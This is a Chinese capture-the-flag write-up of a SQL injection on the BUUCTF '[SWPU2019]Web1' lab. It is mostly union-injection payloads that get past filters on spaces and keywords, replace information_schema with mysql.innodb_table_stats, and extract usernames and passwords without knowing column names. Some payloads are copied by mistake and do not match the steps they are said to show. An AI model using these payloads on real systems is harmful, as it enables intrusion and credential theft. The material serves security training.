本期的sql注入实战在：BUUCTF在线评测 (buuoj.cn)   该网站上进行。

启动靶机：

1.进来后搜索web1

2.点击【SWPU2019】Web1启动靶机。

3.进来之后在此界面进行注入。

开始注入：

1.找注入点：

我们输入1' 后查看广告详情发现报错，说明我们找到了注入点1'   

2.爆破列数

已经存在注入点，就需要找出所在表的列数，并找出在哪一列出数据，我们才能进行下一步。

经过测试，我们发现被过滤了几个东西：

• order  by被过滤
• 空格被过滤了
• #号被过滤了
• -- 被过滤
• and被过滤了

替代方法：使用group  by替代order by，空格有一种常规的替代使用/**/

注意1：当我们 使用&&闭合时会出现我们，即使写的再大都不会报错，如下图：说明&&有问题我们不能使用。

                                

爆列数：

在这里使用如下方法进行闭合：在sql语句后面接一个数字时，sql语句还是会正常执行。经过测试发现当group  by 22时不会报错，当group  by 23时会报错。说当前所在表的列数为22列。

group  by 22:

group  by 23 :

所以：可以得知当前表的列数为22。

还要一种爆破出列数的方法：

直接使用： union  select 1,2,3,4..........

一个一个试，知道不报错为止。

3爆出数据的列

使用：因为后面有一个数字来闭合所以只需要写21个数字。

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'10

可以看到，数据出在2，3列

4爆数据库名和用户名

-1'/**/union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'10

5爆表名

经过测试：information_schema被过滤。

我们使用另一个来替代它：mysql.innodb_table_stats

查看表结构：

输入：

-1'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"&&'1'='1

此时，我们就可以查看出当前数据库web1中的表有：ads，users两张表。

6无列明注入

根据mysql.innodb_table_stats结构我们可以知道其中并没有记录字段名的信息。

我们可以根据连接查询将列明爆出了：使用jion

但是再这里jion被过滤了，就再也没有办法来爆出列名了。此时我们只能使用无列名注入来进行下一步操作了。

两张表：ads  users

先查询ads，在ads中只有2，3字段出数据，所以我们只能查2，3字段的数据。

ads第二字段数据：

可以看出该字段没有数据。

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/union/**/select/**/*/**/from/**/ads)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

ads第三字段数据：

可以看出来虽然查出来了数据但这些数据都不是我们想要的。所以接下来我们需要在users表中查询数据。

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/union/**/select/**/*/**/from/**/ads)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

在users表中查询：

目前我们不知道users表中有几列，这时我们可以一个一个试。因为users表中至少有一列，我们直接试到出数据为止：

假设users有一列：

-1'/**/union/**/select/**/1,(select/**/group_concat(aa)/**/from(select/**/1/**/as/**/aa/**/union/**/select/**/*/**/from/**/users)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

假设users有两列：

-1'/**/union/**/select/**/1,(select/**/group_concat(aa)/**/from(select/**/1/**/as/**/aa,2/**/union/**/select/**/*/**/from/**/users)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

假设users有三列：

-1'/**/union/**/select/**/1,(select/**/group_concat(aa)/**/from(select/**/1/**/as/**/aa,2/**/union/**/select/**/*/**/from/**/users)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

当试到三列的时候出数据了，并且没有报错。

这里出的数据为users表第一列的数据：

users表第二列数据：

-1'/**/union/**/select/**/1,(select/**/group_concat(aa)/**/from(select/**/1,2/**/as/**/aa,3/**/union/**/select/**/*/**/from/**/users)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

users表第三列数据：

-1'/**/union/**/select/**/1,(select/**/group_concat(aa)/**/from(select/**/1,2,3/**/as/**/aa/**/union/**/select/**/*/**/from/**/users)as/**/a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'1

到此我们就吧users表中的所有数据查出来了，明显第二列为用户名，第三列为密码，密码一般都被加密了的。

到此我们就成功的完成了一次sql注入，成功的拿到了用户名和密码。

总结：这次实战过滤了几个我们常用的字符，当被过滤后我们就需要去思考使用其他的去替代它。整体不是很难，不过需要我们仔细。